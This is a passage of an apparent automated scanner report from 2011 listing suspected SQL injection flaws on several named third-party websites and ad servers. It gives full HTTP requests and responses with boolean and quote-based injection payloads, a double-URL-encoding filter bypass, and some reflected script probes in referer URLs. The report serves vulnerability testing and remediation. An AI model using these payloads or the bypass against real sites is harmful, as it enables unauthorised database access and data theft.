var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/a%3B232374964%3B1-0%3B0%3B50145927%3B4307-300/250%3B38381379/38399136/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/index.html%3Fvc%3D167525");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.devry.edu";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/
...[SNIP]...

Request 2

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?12387390'%20or%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 03 May 2011 15:41:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2049738/1-devry_bestOf_300.swf";
var gif = "http://s0.2mdn.net/2049738/1-best_of300.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/c%3B232374964%3B0-0%3B0%3B50145927%3B4307-300/250%3B38381412/38399169/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/c%3B232374964%3B0-0%3B0%3B50145927%3B4307-300/250%3B38381412/38399169/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "http://www.devry.edu";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclic
...[SNIP]...

1.3. http://as.casalemedia.com/j [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The p parameter appears to be vulnerable to SQL injection attacks. The payloads 14038288'%20or%201%3d1--%20 and 14038288'%20or%201%3d2--%20 were each submitted in the p parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /j?s=121910&u=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert(%2522DORK%2522)-%2522f8cf8d87874%3D1&a=4&id=54048766&p=014038288'%20or%201%3d1--%20&v=2&inif=0&l=671&t=402&w=1920&h=1156&z=300&r=http%3A%2F%2Fburp%2Fshow%2F2 HTTP/1.1
Host: as.casalemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 03 May 2011 15:41:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:59 GMT
Content-Length: 482
Connection: close

document.write('<iframe id="cmif4-4136752264" src="http://cdn.optmd.com/blank.html" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no" allowtransparency="true" onload="var if1 = document.getElementById(\'cmif4-4136752264\'); if (if1.src == \'http://cdn.optmd.com/blank.html\') {if1.src=\'http://ad.doubleclick.net/adi/N5685.126265.1877228746421/B3560676.7;sz=300x250;click0=http://c.casalemedia.com/c/4/1/77336/;ord=0008986600\';}"></iframe>');

Request 2

GET /j?s=121910&u=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert(%2522DORK%2522)-%2522f8cf8d87874%3D1&a=4&id=54048766&p=014038288'%20or%201%3d2--%20&v=2&inif=0&l=671&t=402&w=1920&h=1156&z=300&r=http%3A%2F%2Fburp%2Fshow%2F2 HTTP/1.1
Host: as.casalemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 03 May 2011 15:41:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:59 GMT
Content-Length: 469
Connection: close

document.write('<iframe id="cmif4-3550049546" src="http://cdn.optmd.com/blank.html" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no" allowtransparency="true" onload="var if1 = document.getElementById(\'cmif4-3550049546\'); if (if1.src == \'http://cdn.optmd.com/blank.html\') {if1.src=\'http://ad.doubleclick.net/adi/N4375.Casale/B5142683.29;sz=300x250;click0=http://c.casalemedia.com/c/4/1/85037/;ord=0008986063\';}"></iframe>');

1.4. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The tl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tl parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /TagPublish/getad.aspx?01AD=30bJhJdVES12avFPxQG7RVt7LtS_3h86E4ESPmcVEzzZpFtKyX64ldQ&01RI=927EA66A3E77DF3&01NA=na&tagver=1&ca=VIEWAD&cp=503597&ct=94417&cf=300X250&cn=1&rq=1&dw=300&cwu=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1&mrnd=69691697&if=1&tl=-1'&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: C2W4=CT-1; cw=cw

Response 1

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP118
Content-Length: 1183
Date: Tue, 03 May 2011 15:42:02 GMT
Connection: close
Set-Cookie: C2W4=CT-USR; expires=Tue, 31-May-2011 15:42:02 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var strCreative=''
+ '<img src=http://media.contextweb.com/creatives/defaults/300x250.gif height=250 border=0 width=300 alt="There is an error in the ad tag code."><!--ERROR_TAG(id=cw-app118_If00MivX
...[SNIP]...

Request 2

GET /TagPublish/getad.aspx?01AD=30bJhJdVES12avFPxQG7RVt7LtS_3h86E4ESPmcVEzzZpFtKyX64ldQ&01RI=927EA66A3E77DF3&01NA=na&tagver=1&ca=VIEWAD&cp=503597&ct=94417&cf=300X250&cn=1&rq=1&dw=300&cwu=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1&mrnd=69691697&if=1&tl=-1''&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: C2W4=CT-1; cw=cw

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB29
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2786
Date: Tue, 03 May 2011 15:42:03 GMT
Connection: close
Set-Cookie: C2W4=CT-USR; expires=Tue, 31-May-2011 15:42:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: V=31zUofH1ZIBx; domain=.contextweb.com; expires=Thu, 03-May-2012 15:42:03 GMT; path=/
Set-Cookie: 503597_3_94417=1304437323738; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Wed, 04-May-2011 04:00:00 GMT; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var strCreative=''
+ '<!-- begin ad tag -->\n'
+ '<script type="text/javascript">\n'
+ '//<![CDATA[\n'
+ 'ord=Math.random()*10000000000000000;\n'
+ 'document.write(\'<script type="text/javasc
...[SNIP]...

1.5. http://tag.contextweb.com/TagPublish/getjs.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish%2527/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response 1

HTTP/1.1 404 Not Found
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP118
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 970
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:41:50 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:50 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><title>GlassFish v3 - Error report</title><style type="text/css"><!--H1 {font-f
...[SNIP]...

Request 2

GET /TagPublish%2527%2527/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response 2

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:41:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:50 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Content-Length: 37

<html><body>Bad Request</body></html>

1.6. http://www.aiche.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aiche.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=fhuuwaqhnsd0cfemhcqgev45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94639

Error occured in UrlAliasContentIDLookUp : System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string 'Sitemap/index.aspx?404;http://www.aiche.org:80/favicon.ico''.
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)
at Sys
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=o3r0yb30w3ot4x45cfuuor55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <head><title>
   AIChE - Sitemap
</title><meta http-equiv="Content
...[SNIP]...

1.7. http://www.aiche.org/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aiche.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=uw5fjq55xit21l55sew1sn55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94608

Error occured in UrlAliasContentIDLookUp : System.Data.SqlClient.SqlException: Incorrect syntax near '='.
Unclosed quotation mark after the character string ''.
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)
at System.Data.SqlClient.SqlInternalConnection.OnError(SqlExcepti
...[SNIP]...

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=ulrrd555uggy1qfzv4z5jr55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <head><title>
   AIChE - Sitemap
</title><meta http-equiv="Content
...[SNIP]...

1.8. http://www.amateurfarm.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.amateurfarm.net
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 63872318'%20or%201%3d1--%20 and 63872318'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico63872318'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurfarm.net
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:27:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 534
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico63872318' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.amateurfarm.net Port 80</address>
</body></html>

Request 2

GET /favicon.ico63872318'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurfarm.net
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:27:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 530
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico63872318' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.amateurfarm.net Port 80</address>
</body></html>

1.9. http://www.amateurfarm.net/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.amateurfarm.net
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10480672%20or%201%3d1--%20 and 10480672%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?110480672%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurfarm.net
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:26:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 515
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.amateurfarm.net Port 80</address>
</body></html>

Request 2

GET /favicon.ico?110480672%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurfarm.net
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:26:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 511
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.amateurfarm.net Port 80</address>
</body></html>

1.10. http://www.divorcemag.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.divorcemag.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:54 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=354213325c0864e086f273119a41caa9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 60

Query to the database server failed, sorry. Try again later.

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:21:54 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=96638fd64097146eda9c1968b6ecdd96; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 488

